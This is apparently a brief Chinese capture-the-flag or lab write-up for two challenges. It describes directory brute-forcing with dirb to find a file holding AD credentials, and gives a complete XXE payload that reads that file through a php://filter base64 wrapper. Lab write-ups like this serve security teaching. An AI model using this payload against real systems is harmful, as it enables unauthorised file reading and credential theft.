# D2,D3 write-up ## D2 dirb > 以dirb去掃網頁資料夾裡的檔案，找出gotit.txt > 裡面有AD帳密 ## D3 xxe > php以xml語法寫成，用xxe手法得到AD帳密 ```xml= <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds [<!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/AMP/Apache24/htdocs/testing/gotit.txt">]> <base64> <encode>false</encode> <data>&goodies;</data> </base64>